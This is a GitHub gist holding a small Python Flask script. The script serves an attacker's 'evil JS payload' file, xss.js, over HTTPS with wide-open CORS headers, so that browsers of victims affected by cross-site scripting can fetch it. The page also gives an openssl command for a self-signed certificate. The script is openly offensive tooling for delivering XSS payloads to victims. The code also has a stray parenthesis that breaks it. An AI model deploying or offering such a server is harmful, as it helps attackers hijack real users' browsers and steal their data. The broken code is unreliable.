Skip to content

Instantly share code, notes, and snippets.

@queencitycyber
Last active April 25, 2022 15:31
Show Gist options
  • Save queencitycyber/fb3aa59ebc2d5557263b7c164511ad33 to your computer and use it in GitHub Desktop.
Save queencitycyber/fb3aa59ebc2d5557263b7c164511ad33 to your computer and use it in GitHub Desktop.
Flask server, enable CORS Access-Control-Allow-Origin headers to accept connections from an XSS affected victim while hosting XSS PoC
"""
A tiny Flask web server ready to shoot reflective CORS Access-Control-Allow-Origin headers to accept connections from an XSS affected victim while hosting your evil JS payload
"""
# Stolen from https://twitter.com/snovvcrash/status/1511702029403631620
from flask import Flask, send_file
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
@app.route('/xss.js', methods=['GET'])
def xss():
return send_file('./xss.js'), download_name='xss.js')
# openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment